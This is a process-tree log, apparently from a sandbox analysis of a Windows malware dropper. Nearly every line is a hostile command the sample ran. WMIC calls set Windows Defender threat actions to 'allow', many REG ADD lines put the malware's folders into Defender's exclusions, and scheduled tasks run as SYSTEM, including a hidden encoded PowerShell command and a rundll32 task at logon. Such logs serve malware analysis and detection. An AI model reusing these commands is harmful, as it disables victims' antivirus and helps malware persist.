C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:1740

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:1724

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1600

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1256

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:544

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:1716

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1896

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1720

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:1068

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1392

C:\Windows\system32\taskeng.exe
taskeng.exe {BC48D513-17A7-474F-91D4-EAECC0805B27} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1816

C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM\JPAWcIpLIGBPzJZ\gBGvkxp.exe
C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM\JPAWcIpLIGBPzJZ\gBGvkxp.exe OV /site_id 767 /S
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1904

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
3⤵
PID:1788

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:880

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1652

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1548

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:556

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:828

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1260

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1124

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:1080

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:760

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1660

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1900

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:1432

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gRRVfvSMb" /SC once /ST 11:20:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:1536

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gRRVfvSMb"
3⤵
PID:792

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gRRVfvSMb"
3⤵
PID:1556

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ONbcuvmDOvHMWTXn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:380

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ONbcuvmDOvHMWTXn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1668

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ONbcuvmDOvHMWTXn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1232

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ONbcuvmDOvHMWTXn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1876

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ONbcuvmDOvHMWTXn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1152

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ONbcuvmDOvHMWTXn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1804

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ONbcuvmDOvHMWTXn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2020

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ONbcuvmDOvHMWTXn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1400

C:\Windows\SysWOW64\cmd.exe
cmd /C copy nul "C:\Windows\Temp\ONbcuvmDOvHMWTXn\erSjeiBb\JWFHYHSeSIFNAspq.wsf"
3⤵
PID:1660

C:\Windows\SysWOW64\wscript.exe
wscript "C:\Windows\Temp\ONbcuvmDOvHMWTXn\erSjeiBb\JWFHYHSeSIFNAspq.wsf"
3⤵
- Modifies data under HKEY_USERS
PID:2008

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnDWhryCSIE" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1600

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnDWhryCSIE" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1740

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XpqoUDXlJoUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1812

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XpqoUDXlJoUn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1340

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kuGFoFUJyZFbBZdRkpR" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1836

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kuGFoFUJyZFbBZdRkpR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:968

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mrDIPifxyaTU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1492

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mrDIPifxyaTU2" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1556

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\piLDiRqvGTKTC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:240

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\piLDiRqvGTKTC" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1876

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qDCCGhOyU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1388

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qDCCGhOyU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1268

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\xoWQddOigjsPCTVB" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2004

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\xoWQddOigjsPCTVB" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2000

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\zVCERlXqEUubX" /t REG_DWORD /d 0 /reg:32
4⤵
PID:908

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\zVCERlXqEUubX" /t REG_DWORD /d 0 /reg:64
4⤵
PID:880

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1600

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM" /t REG_DWORD /d 0 /reg:64
4⤵
PID:904

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ONbcuvmDOvHMWTXn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:848

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ONbcuvmDOvHMWTXn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:544

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnDWhryCSIE" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2036

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnDWhryCSIE" /t REG_DWORD /d 0 /reg:64
4⤵
PID:580

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XpqoUDXlJoUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:380

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XpqoUDXlJoUn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:112

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kuGFoFUJyZFbBZdRkpR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1432

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kuGFoFUJyZFbBZdRkpR" /t REG_DWORD /d 0 /reg:64
4⤵
PID:928

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mrDIPifxyaTU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1388

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mrDIPifxyaTU2" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1588

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\piLDiRqvGTKTC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1392

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\piLDiRqvGTKTC" /t REG_DWORD /d 0 /reg:64
4⤵
PID:900

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qDCCGhOyU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1740

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qDCCGhOyU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:880

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\xoWQddOigjsPCTVB" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1064

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\xoWQddOigjsPCTVB" /t REG_DWORD /d 0 /reg:64
4⤵
PID:952

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\zVCERlXqEUubX" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2032

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\zVCERlXqEUubX" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1760

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2036

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1756

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ONbcuvmDOvHMWTXn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1556

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ONbcuvmDOvHMWTXn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1720

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "lJLWniCkwZbjhapzm" /SC once /ST 08:42:53 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ONbcuvmDOvHMWTXn\cMoyCgwrTdLTZce\QSmuyCT.exe\" 7V /site_id 767 /S" /V1 /F
3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1400

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "lJLWniCkwZbjhapzm"
3⤵
PID:1900

C:\Windows\Temp\ONbcuvmDOvHMWTXn\cMoyCgwrTdLTZce\QSmuyCT.exe
C:\Windows\Temp\ONbcuvmDOvHMWTXn\cMoyCgwrTdLTZce\QSmuyCT.exe 7V /site_id 767 /S
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:1584

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
3⤵
PID:1640

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:1812

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1724

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1768

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:1456

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:880

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1656

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:848

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:968

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:2036

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:632

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1560

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:1268

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bkckNrBYOjfprwtEPo"
3⤵
PID:1804

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
3⤵
PID:2008

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
4⤵
PID:1492

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
3⤵
PID:1432

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
4⤵
PID:1216

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\qDCCGhOyU\JvcDDD.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "pMLebdOaFqOcGSU" /V1 /F
3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1876

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "pMLebdOaFqOcGSU2" /F /xml "C:\Program Files (x86)\qDCCGhOyU\vpEBxrg.xml" /RU "SYSTEM"
3⤵
- Creates scheduled task(s)
PID:1592

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "pMLebdOaFqOcGSU"
3⤵
PID:972

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "pMLebdOaFqOcGSU"
3⤵
PID:1176

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "GxGlmfAoAweICH" /F /xml "C:\Program Files (x86)\mrDIPifxyaTU2\gOPnXLu.xml" /RU "SYSTEM"
3⤵
